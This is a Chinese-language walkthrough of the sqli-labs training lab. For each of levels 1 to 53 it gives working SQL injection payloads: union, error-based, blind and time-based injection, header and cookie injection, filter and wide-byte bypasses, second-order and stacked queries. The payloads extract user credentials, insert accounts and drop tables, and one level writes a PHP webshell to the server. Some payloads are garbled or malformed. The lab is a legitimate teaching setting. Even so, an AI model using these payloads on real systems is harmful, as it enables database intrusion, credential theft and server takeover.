sqlilab题解&&总结
闭合报错
1
2?id=1’ ?id=1”如果都报错,则为整形闭合
尝试?id=1–+
- 无报错则整形闭合。报错则整形加括号
如果单引号报错,双引号不报错
尝试?id=1’–+
- 无报错则单引号闭合。报错则单引号加括号
如果单引号不报错,双引号报错。
尝试?id=1”–+- 无报错则双引号闭合。报错则双引号加括号。
sqlilab
1(联合注入)
第一关反馈数字为字符型
注入需要?id=1’
使用?id=xx测试

拆解

有3段

爆出数据所在位置

爆出版本和库名

查所有表名
用户的账号密码大概率在user

查列名(得到id)

查询user下的所有列名(得到username passward)
得到对应数据

2


第二关无数字反馈 为数字型
注入需要?id=1
1
2
3
4
5
6?id=1 order by 3 ?id=-1 union select 1,2,3 ?id=-1 union select 1,database(),version() ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ?id=-1 union select 1,2,group_concat(username ,id , password) from users一步一步来

分段

爆出数据所在位置




3

测试出现括号, 且为字符型
1
2
3
4
5
6
7?id=1')--+(闭合括号) ?id=1') order by 3--+ ?id=-1') union select 1,2,3--+ ?id=-1') union select 1,database(),version()--+ ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1') union select 1,2,group_concat(username ,id , password) from users--+一步一步来
4

单引号无报错
使用双引号测试

1
2
3
4
5
6?id=1") order by 3--+(使用双引号测试)(闭合括号) ?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
5(报错注入)

字符型

页面无回显(不能使用联合注入)
报库(报错注入)

0x7e是波浪线

报表(全部)(在user概率较大)
http://sqli-labs-master:82/Less-5/?id=1‘ and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema=’security’),0x7e),1) –+

爆列

得到数据
6

使用双引号
1
2
3
4
5
6
7
8
9
10?id=1" ?id=1" and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ ?id=1" and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ ?id=1"and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ ?id=1"and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) --+
7(文件写入/布尔盲注)

测试(题目要求使用文件上传)

写入文件(仿照木马病毒)
先判断断点

有3个断点
使用木马病毒的语句
http://sqli-labs-master:82/Less-7/?id=1'))union select 1,’‘,3 into outfile “D:\software\phpstudy_pro\WWW\sqli-labs-master\Less-7\shell.php”– qwe
(在文件夹less-7中出现shell.php文件 内容为以及目标服务器的账户密码)
可以读取php代码,配合菜刀可以进入服务器
8(布尔盲注)

’ 闭合(只显示正确,错误页面,布尔盲注)
1
?id=1’and length((select database()))>=5–+(猜库的长度)
?id=1’ and mid(database(),1,1)=‘s’–+(猜库的名称)
(?id=1’ and ascii(substr((select database()),1,1))=115–+ 115=’s’)
?id=1’ and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=‘security’),1,1))>=101–+
(同理猜解出表名,列名)
?id=1’ and ascii(substr((select group_concat(username,password) from users),1,1))=68–+(获取数据)
1

9(时间注入)
无论输入什么都没有报错
使用时间注入
判断类型

?id=1’ and if(1=1,sleep(5),1)–+
页面有时间延迟,则为真
剩余步骤同布尔盲注
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23?id=1' and if(1=1,sleep(5),1)--+ 判断参数构造。 ?id=1'and if(length((select database()))>9,sleep(5),1)--+ 判断数据库名长度 ?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 逐一判断数据库字符 ?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 判断所有表名长度 ?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 逐一判断表名 ?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 判断所有字段名的长度 ?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 逐一判断字段名。 ?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 判断字段内容长度 ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+ 逐一检测内容。
10

?id=1” and if(1=1,sleep(5),1)–+
双引号闭合
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23?id=1" and if(1=1,sleep(5),1)--+ 判断参数构造。 ?id=1"and if(length((select database()))>9,sleep(5),1)--+ 判断数据库名长度 ?id=1"and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 逐一判断数据库字符 ?id=1"and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 判断所有表名长度 ?id=1"and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 逐一判断表名 ?id=1"and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 判断所有字段名的长度 ?id=1"and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 逐一判断字段名。 ?id=1" and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 判断字段内容长度 ?id=1" and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+ 逐一检测内容。
11(post注入)

写入1‘出现报错
抓包(相当于get,直接联合注入)

也可在username对话框直接写联合注入代码
1
2
3
4
5
6
71'or 1=1# 1' order by 3# -1' union select 1,2# -1' union select ,version,database(,version# -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security# -1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users# -1' union select 1,group_concat(username ,id , password) from user#
12
写入1”出现报错

使用 “)进行闭合
1
2
3
4
5
6
7
1" )or 1=1#
1" ) order by 3#
-1" ) union select 1,2#
-1" ) union select ,version,database(,version#
-1" ) union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
-1" ) union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
-1" ) union select 1,group_concat(username ,id , password) from user#13
写入1‘出现报错

使用 ‘)进行闭合
1
2
3
4
5
6
7
1' )or 1=1#
1' ) order by 3#
-1' ) union select 1,2#
-1' ) union select ,version,database(,version#
-1' ) union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
-1' ) union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
-1' ) union select 1,group_concat(username ,id , password) from user#14
写入1”出现报错

只使用双引号
1
2
3
4
5
6
7
1"or 1=1#
1" order by 3#
-1" union select 1,2#
-1" union select ,version,database(,version#
-1" union select 1,group_concat(table_name) from information_schema.tables where table_schema='security#
-1" union select 1,group_concat(column_name) from information_schema.columns where table_name='users#
-1" union select 1,group_concat(username ,id , password) from user#15(post布尔注入)

1’ or 1=1#
无反馈,使用布尔盲注
uname= 相关代码 &passwd=&submit=Submit
1
2
3
4
5
6
7
8
91' or 1=1#(判断闭合符号) 1' or length(database())>7#(猜数据库长度) 1' or ascii(substr(database(),1,1))>114#(猜数据库名字) 1' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#(猜表名长度) 1' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#(猜表名名字) 1' or (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#(猜列名长度) 1' or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#(猜列名名字) 1' or length((select password from users limit 0,1))>3#(猜数据长度) 1' or ascii(substr((select password from users limit 0,1),1,1))>67#(猜数据名字)
16

双引号+括号进行闭合
uname= 相关代码 &passwd=&submit=Submit
1
2
3
4
5
6
7
8
91") or 1=1#(判断闭合符号) 1") or length(database())>7#(猜数据库长度) 1") or ascii(substr(database(),1,1))>114#(猜数据库名字) 1") or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#(猜表名长度) 1") or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#(猜表名名字) 1") or (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#(猜列名长度) 1") or ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#(猜列名名字) 1") or length((select password from users limit 0,1))>3#(猜数据长度) 1") or ascii(substr((select password from users limit 0,1),1,1))>67#(猜数据名字)
17
题目提示修改密码
抓包之后还是post型所以使用passd进行测试
根据源代码

表明:uname只能是库名
使用passd注入

uname=admin
passd=1’ 出现报错
使用报错注入

1
2
3
4
5
6
7uname=admin 1' or 1=1# 1' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)# 1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) # 1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)# 1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1)#
18

提示user agent

源代码将uname&passwd都使用check_input函数
注入ua

提示闭合 为单引号
报错注入
1
2
3
4
5
6
71' and updatexml(1,concat(0x7e,(select database())),1) and '1' ='1# 1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) and '1' ='1# 1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' ='1# 1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) and '1' ='1#
19

提示referer
1
2
3
4
5
6
71' and updatexml(1,concat(0x7e,(select database())),1) and '1' ='1# 1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) and '1' ='1# 1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' ='1# 1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) and '1' ='1#
20(cookie)

出现cookie
登录后在刷新抓包

测试单引号闭合
使用联合注入或者报错注入
1
2
3
4
5
6
7uname=admin' 1' and updatexml(1,concat(0x7e,(select database())),1) and '1' ='1# uname=admin'1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) and '1' ='1# uname=admin'1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) and '1' ='1# uname=admin'1'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) and '1' ='1#
21(cookie+base64)

出现base64编码
闭合为单引号(‘)
解码后使用
联合注入或者报错注入
22

出现base64编码
闭合为双引号(“)
解码后使用
联合注入或者报错注入
23(只联合)

本题过滤了#和–( 不能注释后面的字符)
只能使用联合
因为只有联合使用OR ‘1’=’1可以代替注释符
但是使用报错注入的话,and ‘1’=’1不能替代注释符

为单引号闭合
1
2
3
4
5
6
7
8
9id=1' or '1' ='1 id=-1' union select 1, database(),version() or '1' = '1 id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security'),3 or '1'='1 id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security' and table_name=‘users’ ),3 or '1'='1 id=-1' union select 1,(select group_concat(password,“-”,username) from users),3 or '1'='1
24(二次注入)
注册
账号admin’ #
密码111

再登录账号

修改密码
111 222 222
但是此时的admin’ #密码并没有修改(因为账户为admin‘ # 屏蔽了后面的密码修改代码)
所以成功绕过

可以登入数据库
25(双写)

注释了or和and
限制了联合和报错的order by | and xxxx
重复注入(oorr anandd)只过滤一个
1
2
3
4
5
6
7
8
9?id=1' ?id=1' anandd updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ ?id=1' anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ ?id=1'anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ ?id=1'anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) --+1
2
3
4
5
6?id=1' oorrder by 3 ?id=-1' union select 1,2,3 ?id=-1' union select 1,database(),version() ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ?id=-1' union select 1,2,group_concat(username ,id , password) from users
25a

无反馈,为数字注入
1
2
3
4
5
6
7
8
9?id=1 ?id=1 anandd updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ ?id=1 anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ ?id=1anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ ?id=1anandd updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1) --+1
2
3
4
5
6?id=1 oorrder by 3 ?id=-1 union select 1,2,3 ?id=-1 union select 1,database(),version() ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ?id=-1 union select 1,2,group_concat(username ,id , password) from users
26(双写、注释符绕过)

过滤了逻辑运算符,注释符以及空格
双写绕过逻 辑运算符或者使&&和||替换
空格过滤:
1
2
3
4
5
6
7%09 Tab键(水平) %0a 新建一行 %0c 新的一页 %0d return 键 %0b Tab键(垂直) %a0 空格 () 绕过注释符绕过:
;%00
1
2
3
4
5
6
7
8
9
10
11
12?id=1' ?id=1'anandd(updatexml(1,concat(0x7e,database()),0x7e),1);%00 ?id=1'anandd(updatexml(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1));%00 ?id=1'anandd(updatexml(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')),1));%00 显示不全(因为显示的字段太长,有限制) ?id=1'anandd(updatexml(1,mid((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')),40,100),1));%00 (加mid由于,其可以使用更加简洁的输出想要的字段) ?id=1'anandd(updatexml(1,(select(group_concat(username,0x7e,passwoorrd))from(users)),1));%00
26a

无显示报错信息
不能使用报错注入,使用盲注/联合
(但是联合括号太多了)
1
2
3
4
5?id=1')anandd(length(database())=8);%00 ?id=1')anandd(ascii(substr(database(),1,1))=115);%00 ?id=1')anandd(length((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))=29);%00 ?id=1')anandd(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,1))=101);%00
27
确定以单引号闭合

而且禁用了两个关键词
UNION & SELECT
有报错可以使用报错注入,可以使用大小写绕过
1
2
3
4
5
6
7
8
9
10?id=1'and(updatexml(1,concat(0x7e,database()),0x7e),1);%00 ?id=1'and(updatexml(1,(SELect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),1));%00 ?id=1'and(updatexml(1,(SELect(group_concat(column_name))from(information_schema.columns)where(table_name='users')),1));%00 显示不全(因为显示的字段太长,有限制) ?id=1'and(updatexml(1,mid((SELect(group_concat(column_name))from(information_schema.columns)where(table_name='users')),40,100),1));%00 (加mid由于,其可以使用更加简洁的输出想要的字段) ?id=1'and(updatexml(1,(SELect(group_concat(username,0x7e,password))from(users)),1));%00
27a
- 双引号注入
但是无报错,所以使用盲注
1
2
3
4
5
?id=1"and(length(database())=8);%00
?id=1"and(ascii(substr(database(),1,1))=115);%00
?id=1"and(length((SELect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))=29);%00
?id=1"and(ascii(substr((SELect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,1))=101);%0028

过滤空格和注释符
单引号+括号闭合
无回显,使用盲注/联合
1
2
3
4?id=1')and(length(database())=8);%00 ?id=1')and(ascii(substr(database(),1,1))=115);%00 ?id=1')and(length((SELect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))=29);%00 ?id=1')and(ascii(substr((SELect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,1))=101);%00
28a

只过滤union select
双写绕过
1
2
3
4
5
6
7
8
9
10
11
12
13?id=1');%00 ?id=1') order by 3;%00 ?id=-1') ununion selection select 1,2,3;%00 ?id=-1') ununion selection select 1,database(),version();%00 ?id=-1') ununion selection select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security';%00 ?id=-1') ununion selection select 1,2,group_concat(column_name) from information_schema.columns where table_name='users';%00 ?id=-1') ununion selection select 1,2,group_concat(username,id,password) from users;%00或者布尔注入
1
同上题
29HPP http参数污染(双服务器)
1
2
3
4
5
6id=1' order by 3--+(使用双引号测试)(闭合括号) ?id=-1' union select 1,2,3--+ ?id=-1' union select 1,database(),version()--+ ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1' union select 1,2,group_concat(username ,id , password) from users--+
重点
参数污染:提交相同参数,不同的处理方式
1
2
?id=123
cookie: id=1231
?id=123&id=13555对两个id的传参处理不一样

30
1
2
3
4
5
6id=1" order by 3--+(使用双引号测试)(闭合括号) ?id=-1" union select 1,2,3--+ ?id=-1" union select 1,database(),version()--+ ?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1" union select 1,2,group_concat(username ,id , password) from users--+
31
1
2
3
4
5
6id=1") order by 3--+(使用双引号测试)(闭合括号) ?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+
32(转义 宽字节注入)

(preg_replace预定义字符之前添加反斜杠)
此函数将 “ ’ 转化
加%df+单引号 ,相当于两个字符—>表示汉字
使得单引号逃逸出来
1
2
3
4
5
6
7
8?id=-1%df'union select 1,database(),3 --+ ?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆表 ?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+ 爆字段 使用16进制 ?id=-1%df' union select 1,group_concat(password,username),3 from users--+
33
双引号闭合
1
2
3
4
5
6
7?id=-1%df"union select 1,database(),3 --+ ?id=-1%df" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆表 ?id=-1%df" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+ 爆字段 使用16进制 ?id=-1%df" union select 1,group_concat(password,username),3 from users--+
34(post+宽字节)

表单类型的宽字节
报错注入
1
2
3
4
5
6
7
8
9
101%df' 1%df' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ 1%df' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'
35
数字型+函数addslashes()
(
addslashes()是 PHP 中的一个函数,作用是 在字符串中特殊字符前添加反斜杠(\)进行转义,以防止 SQL 注入或字符串解析错误。)由于是数字型所以无需要宽字节注入
直接报错注入
1
2
3
4
5
6
7
8
9
10
11?id=1 ?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ ?id=1 and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ ?id=1 and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ ?id=1 and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'
36
单引号+宽字节+mysql_real_escape_string()函数转义
mysql_real_escape_string()是 PHP 中的一个函数,主要用于对字符串中的特殊字符进行转义,以防止 SQL 注入使用报错注入即可
1
2
3
4
5
6
7
8
9
101%df' 1%df' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ 1%df' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'
37
单引号+post+宽字节+MySQL_real_escape_string
同34
1
2
3
4
5
6
7
8
9
101%df' 1%df' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --+ 1%df' and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(table_name)),0x7e) from information_schema.tables where table_schema='security'),0x7e),1) --+ 1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(column_name)),0x7e) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+ 1%df'and updatexml(1,concat(0x7e,(select distinct concat(0x7e, (select group_concat(username,id,password)),0x7e) from users ),0x7e),1%df'
38(堆叠注入)
堆叠/报错/联合
单引号+mysqli_multi_query函数
mysqli_multi_query函数支持多条sql语句输出1
2
3
4
5
6?id=1';insert into users(id,username,password) values('18','bx','2328');--+ #id=18的数据修改 改为账户:bx 密码为2328 ?id=18 可查看到18的账户密码已被我们所修改1
2
3
4
5
6
7
8
9
10
11
12?id=1';insert into users(id,username,password) values('18','bx','2328');--+ 注册用户 ?id=1';create table xxx like users;--+ 创建xxx表 ?id=1';INSERT INTO xxx SELECT * FROM users;--+ 插入xxx数据 ?id=1';DELETE FROM xxx;--+ 删除xxx数据 ?id=1';DROP TABLE xxx;--+ 删除xxx表 ?id=1';updata users set password='12345'where username='xxx' 修改xxx账户的密码
39
堆叠/报错/联合
数字型+mysqli_multi_query函数
同上
1
2
3
4
5
6?id=1;insert into users(id,username,password) values('18','bx','2328');--+ #id=18的数据修改 改为账户:bx 密码为2328 ?id=18 可查看到18的账户密码已被我们所修改
40
堆叠/联合
无报错+单引号+括号
1
2
3
4
5
6?id=1');insert into users(id,username,password) values('18','bx','2328');--+ #id=18的数据修改 改为账户:bx 密码为2328 ?id=18 可查看到18的账户密码已被我们所修改
41
堆叠/联合
无报错+数字
1
2
3
4
5
6?id=1');insert into users(id,username,password) values('18','bx','2328');--+ #id=18的数据修改 改为账户:bx 密码为2328 ?id=18 可查看到18的账户密码已被我们所修改
42(先堆叠,再二次注入)
账户进行转义,密码没有,但是存在堆叠注入的函数
(不是gbk编码所以不能使用宽字节)
使用堆叠注入
单引号
1
2
3
4login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login 将id=39 账号:less30 密码:123456
43

为单引号+括号
1
2
3
4login_user=1&login_password=1');insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login 将id=39 账号:less30 密码:123456
44
无报错
测试
1
2
3
4
5
6单引号测试成功 login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')-- 将id=39 账号:less30 密码:123456
45
无报错
测试
单引号测试不成功
1
2
3
4
5
6单引号+括号 测试成功 login_user=1&login_password=1');insert into users(id,username,password) values ('39','less30','123456')-- 将id=39 账号:less30 密码:123456
46

根据提示输入?sort=1
出现表格
寻找闭合
数字型
报错注入
1
?sort=1 and (updatexml(1,concat(0x7c,(select group_concat(password,id,username) from users),0x7c),1))
47
同上
闭合为单引号
1
?sort=1' and (updatexml(1,concat(0x7c,(select group_concat(password,id,username) from users),0x7c),1))
48(order by 下的布尔/时间)
无报错
布尔/时间
布尔
1
2
3
4
5
6
7
8
9
10?sort=rand((ascii(mid((select database()),1,1)))>65) sord=rand and length(database())>7#(猜数据库长度) sord=rand and ascii(substr(database(),1,1))>114#(猜数据库名字) sord=rand and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5#(猜表名长度) sord=rand and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))>116#(猜表名名字) sord=rand and (length((select column_name from information_schema.columns where table_schema=database() and table_name="users"limit 0,1)))>1#(猜列名长度) sord=rand and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),1,1))>116#(猜列名名字) sord=rand and length((select password from users limit 0,1))>3#(猜数据长度) sord=rand and ascii(substr((select password from users limit 0,1),1,1))>67#(猜数据名字)时间:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20?sort=1'and if(length((select database()))>9,sleep(5),1)--+ 判断数据库名长度 ?sort=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 逐一判断数据库字符 ?sort=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 判断所有表名长度 ?sort=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 逐一判断表名 ?sort=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 判断所有字段名的长度 ?sort=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 逐一判断字段名。 ?sort=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 判断字段内容长度 ?sort=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+ 逐一检测内容。
49
单引号闭合,无报错,同理,,时间盲注,布尔盲注
布尔盲注在order by
?sort=’| rand(1=2)–+
使用时间盲注
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20?sort=1'and if(length((select database()))>9,sleep(5),1)--+ 判断数据库名长度 ?sort=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 逐一判断数据库字符 ?sort=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 判断所有表名长度 ?sort=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 逐一判断表名 ?sort=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 判断所有字段名的长度 ?sort=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 逐一判断字段名。 ?sort=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 判断字段内容长度 ?sort=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+ 逐一检测内容。
50(堆叠排序注入)
堆叠/报错/盲注
有报错+数字类型
存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入
1
2?sort=1;insert into users(id,username,password) values('41','bx','2328');--+ 知道了账户和密码
51
堆叠/报错/盲注
有报错+单引号类型
存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入
1
2?sort=1';insert into users(id,username,password) values('41','bx','2328');--+ 知道了账户和密码
52
堆叠/盲注
无报错+数字型
存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入
1
2?sort=1;insert into users(id,username,password) values('41','bx','2328');--+ 知道了账户和密码
53
堆叠/盲注
无报错+单引号
存在 if (mysqli_multi_query($con1, $sql))—>堆叠注入
1
2?sort=1';insert into users(id,username,password) values('41','bx','2328');--+ 知道了账户和密码
总结(精华)
sql注入的诸多payoad利用
sql注入
一、union联合查询注入
常用函数
information_schema.tables #information_schema下面的所有表名
information_schema.columns #information_schema下面所有的列名
table_name #表名
column_name #列名
table_schema #数据库名
information_schema进行跨库攻击
查看当前数据库
?id=-1 union select 1,database() –+
1、获取到所有的数据库名称
